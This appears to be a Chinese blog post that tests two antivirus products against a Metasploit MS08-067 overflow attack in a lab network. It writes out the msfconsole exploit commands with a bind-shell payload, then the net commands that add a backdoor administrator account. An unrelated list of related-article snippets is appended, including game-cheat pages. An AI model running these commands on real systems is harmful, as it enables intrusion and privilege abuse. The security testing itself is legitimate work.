html溢出攻击,溢出(漏洞)攻击的实现及防御

article/2025/9/17 11:56:23

前言

媒体上关于系统漏洞的话题一直不断,在我所接触的用一些朋友和用户中虽然也知道打系统补丁很重要,但却又一直不以为然总以为网络上的危险离自己很远,大部份人都认为进行一次远程攻击很困难甚至认为只要安装了防病毒软件就一切大吉,是不是这样呢?让我们看看今天的操作。

主动防御技术通过微点推出后给现在的安全界注入了一针兴奋剂,现在各大厂商都宣传自己有了主动防御技术,而网络上针对它的宣传也是毁誉参半。 一切都以事实为主,有图有真相。

0818b9ca8b590ca3270a3433284dd417.png

测试环境

Metasploit

操作系统:CentOS5

软件版本:framework-3.5.0-linux-i686.run

IP 地址:192.168.0.10

0818b9ca8b590ca3270a3433284dd417.png

Metasploit(http://www.metasploit.com/framework/download/)是一款开源的安全漏洞检测工具。由于Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。

微点主动防御软件

操作系统:Windows 2000 SP2

微点版本:2010-12-09

IP 地址:192.168.0.200

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

NOD32环境

操作系统:Windows 2000 SP2

软件版本:2010-12-09

IP 地址:192.168.0.100

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

操作步骤

搭建测试环境

按简介中的说明搭建相应的测试环境,保证三台机器都能相互通讯,有关实验环境的搭建方法可以参考利用单主机搭建和物理机器通讯的测试网络这篇文章。有关Metaspolit的安装方法网络上有很多,其方法也不复杂。

查看本地用户

在安装了微点主动防御软件的计算机上打开“用户管理”查看本地的所有用户。

0818b9ca8b590ca3270a3433284dd417.png

对微点进行溢出攻击

登录到安装了Metasploit的系统,同时运行以下的命令启动到Metasploit程序,同时设定调用的溢出漏洞为MS08-067,远程主机为192.168.0.200,本地联接端口为5555,如下图所示。

msfconsole

use exploit/windows/smb/ms08_067_netapi

setPAYLOAD windows/shell/bind_tcp

setRHOST 192.168.0.200

setLPORT 5555

exploit

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

查看攻击结果(微点)

输入上述指令后,本地Metasploit会提示溢出结束但未能取得会话权限,而此时微点已检测到溢出攻击,同时还给出了远程攻击者的IP地址,证明安装微点主动防御软件后能有效防止溢出攻击。具体如下图所示。

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

对NOD32进行溢出攻击

登入Metasploit重新设定远程攻击的主机地址,因开始已指定了具体的溢出漏洞,这里只需要重新设定远程主机地址就可以了。具体指令及截图如下所示。

unset RHOST

setRHOST 192.168.0.100

show options

exploit

0818b9ca8b590ca3270a3433284dd417.png

查看攻击结果(NOD32)

在输入上述指令后会提示已获取远程主机的管理权限,此时在远程管理会话中输入相关指令在计算机中新增用户并赋予其管理员权限,具体指令及截图如下所示。

netusertest 123 /add

net localgroup administrators test /add

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

测试远程添加的用户

为了检测溢出攻击的作用,打开“用户管理”界面时会发现已新增test用户,同时可以使用该用户登陆系统且拥有管理员权限,如下图所示。

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

后记

从上面的测试可以得知微点所宣传的防止溢出(漏洞)攻击确实是有效的。以下是关于该功能的描述。

“本发明涉及计算机缓冲区溢出攻击的检测方法,即,通过建立勾挂函数,检查线程所建立的堆栈帧的返回地址,并根据该返回地址判断是否发生缓冲区溢出,并在发现缓冲区溢出后,将引起该缓冲区溢出的线程结束。利用本发明的缓冲区溢出攻击的检测方法,不但可以高效、准确的检查出恶意程序的缓冲区溢出攻击,而且避免了现有技术中的杀毒软件对新生病毒特征代码获取的滞后性,和防火墙系统使用时的繁琐以及给计算机知识很少的用户带来的麻烦。即使对于新生的缓冲区溢出攻击的病毒、木马也可以准确、高效的进行拦截。”

“申请(专利)号:200510007681.5”

声明

本文的目的绝不是为那些怀有不良动机的人提供支持,也不承担因为技术被滥用所产生的连带责任;本文的目的在到最在限度地唤起大家的网络安全意识,正视我们的网络世界所面临的一声危机,并采取行动。


http://chatgpt.dhexx.cn/article/KT2o5DHh.shtml

相关文章

缓冲区溢出(Buffer Overflow)

堆栈溢出 堆栈溢出通常是所有的缓冲区溢出中最容易进行利用的。了解堆栈溢出之前,先了解以下几个概念: 缓冲区 简单说来是一块连续的计算机内存区域,可以保存相同数据类型的多个实例。堆栈 堆 栈是一个在计算机科学中经常使用的抽象数据类型…

永恒之蓝漏洞复现(Windows server 2008系列缓冲区溢出漏洞)

漏洞信息 漏洞名称:Windows server 2008系列缓冲区溢出漏洞 CVEID:2017-0144 漏洞类型:输入验证错误 威胁类型:远程 发布时间:2017-03-14 危害等级:高危 漏洞简介 Microsoft服务器消息块1.0(…

攻击方式学习之(3) - 缓冲区溢出(Buffer Overflow)

堆栈溢出 堆栈溢出通常是所有的缓冲区溢出中最容易进行利用的。了解堆栈溢出之前,先了解以下几个概念: 缓冲区 简单说来是一块连续的计算机内存区域,可以保存相同数据类型的多个实例。堆栈 堆 栈是一个在计算机科学中经常使用的抽象数据类型…

缓冲区溢出实例(一)--Windows

一、基本概念 缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。 在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server…

linux服务器接收缓冲区拥堵,Linux Kernel IP虚拟服务器栈缓冲区溢出漏洞

发布日期&#xff1a;2013-11-15 更新日期&#xff1a;2013-11-18 受影响系统&#xff1a; Linux kernel < 3.2.13 描述&#xff1a; -------------------------------------------------------------------------------- BUGTRAQ ID: 63744 CVE(CAN) ID: CVE-2013-4588 Li…

20155216 缓冲区溢出漏洞实验

20155216 缓冲区溢出漏洞实验 缓冲区溢出漏洞实验实验简介 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制&#xff0c;甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭&#x…

天骄辅助外挂制作,寻求合作

大家好&#xff0c; 进入正题现有我想开发一款游戏外挂&#xff0c;是针对新天娇的 不知您有没有开发外挂的经验呢&#xff1f;由于本人没有外挂开发的经验也暂时找不到相关的资料学习。 现在打算将这个项目外包出去&#xff0c; 要求&#xff1a; 一台机可以同时登录几个帐号 …

解剖一些外挂制作原理(DNF)

外挂现在大体上来讲分为三种&#xff0c;分别是模拟按键&#xff0c;WPE封包和内存挂。比如模拟键盘的&#xff0c;鼠标的&#xff0c;这种就叫做按键模拟&#xff0c;也叫脚本精灵&#xff1b;还有修改数据包的&#xff0c;这种就叫做WPE封包外挂&#xff0c;这种外挂相对而言…

外挂制作之思路总结和基址与偏移量

从今天起开始学习如何做外挂了 &#xff0c; 很久之前了解过一点皮毛。 无非是读写游戏进程中的内存数据。 再读写内存数据之前首先要做的就是找到游戏进程中在内存中的地址。在基地址中&#xff0c;利用CE寻找到某一数据对应的内存地址。计算出偏移量。然后每次都可以通过内存…

高中数学:数列求和的8种常用方法(最全)

高中数学&#xff1a;数列求和的8种常用方法&#xff08;电子版&#xff09;

常用数列求和公式

斐波那契数列 形如数列&#xff1a;1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, ... 如果设F(n&#xff09;为该数列的第n项&#xff08;n∈N*&#xff09;&#xff0c;那么这句话可以写成如下形式: F(n)F(n-1)F(n-2) 通项公式: 求和公式: Sn2AnA(n-1) - 1 A(n2) -1 等…

在线等比数列求和计算器

在线等比数列求和计算器 在线等比数列求和计算器 该等比数列求和计算器可以计算指定等比数列各项之和,该等比数列求和计算器可以计算指定等比数列各项之和 https://tooltt.com/dbsl-sum/

蓝桥杯JAVA数列求和

import java.util.Scanner; public class Main {public static void main(String[] args) {Scanner sc new Scanner(System.in); int n sc.nextInt(); int a 1,b 1,c 1;for (int i 4; i < n; i) {int temp (a b c)%100000;//为了防止超过最大整数&#xff0c;可以…

C语言例程:数列求和

数列求和 计算 1121231234…12…n 的值。通过该实例&#xff0c;可以学习 if 条件判断语句和 for 循环语句的应用。程序运行结果如图 所示。 #include <stdio.h> int main() { int i,j,n; /* 定义循环变量 i,j&#xff0c;数列项数 n */ long int sum0,temp0; /* 定义…

C语言_等比数列求和

等比数列&#xff1a; 图片来源&#xff1a;百度百科 代码实现 1-递推求和 #include<stdio.h> int main() {int n, i;double q, sum, temp;while (scanf("%d %lf", &n, &q) ! EOF)//实现循环{sum 1;temp 1;for (i 0; i < n; i){temp * q;//让临…

Java、对数列求和

package Recursive;public class Exercise18_05 {public static void main(String[] args) {for (int i 1; i < 10; i) //计算m(i)&#xff0c;i 1,2,...10System.out.println("m(" i ") is " m(i));}/** 返回数列和 */public static double m(i…

等差数列求和

文章目录 #任务4.等差数列求和(一&#xff09;编程实现 &#xff08;二&#xff09;讲解知识点&#xff08;三&#xff09;扩展练习任务1.打印水仙花数任务5.打印九九乘法表 #任务4.等差数列求和 -任务&#xff1a;计算123…100的值 (一&#xff09;编程实现 -创建net.lixin…

等比数列求和

引入&#xff1a; 先来看一个问题&#xff0c;求的所有约数之和&#xff1b; 解决思路如下&#xff1a;首先将分解质因数&#xff0c;表示为&#xff0c;其中均为质数&#xff0c;因此表示为&#xff1a;。此时我们将的所有约数表示为集合&#xff0c;从这个约数中选出个数的…

相控阵天线(二):非规则直线阵列天线(稀布阵列、稀疏阵列、平方率分布阵列、含python代码)

目录 非规则线阵概述不均匀递变间距阵列稀布阵列稀疏阵列不均匀相位递变阵列不均匀幅度激励阵列代码示例 非规则线阵概述 非规则线阵主要包括以下情况&#xff1a; 1. 不均匀间距阵列&#xff1a; a&#xff09;不均匀间距递变阵列&#xff1a;单元间距按照一定的系数递增&…

Dell服务器组建阵列-Raid(有阵列卡)

如何使用Dell PowerEdge 14G服务器的系统设置在Dell RAID 控制器(PERC 10)上创建虚拟磁盘 步骤&#xff1a; 在系统启动期间&#xff0c;按F2键进入System Setup&#xff08;系统设置&#xff09;主菜单。 单击Device Settings&#xff08;设备设置&#xff09;。 单击所需的…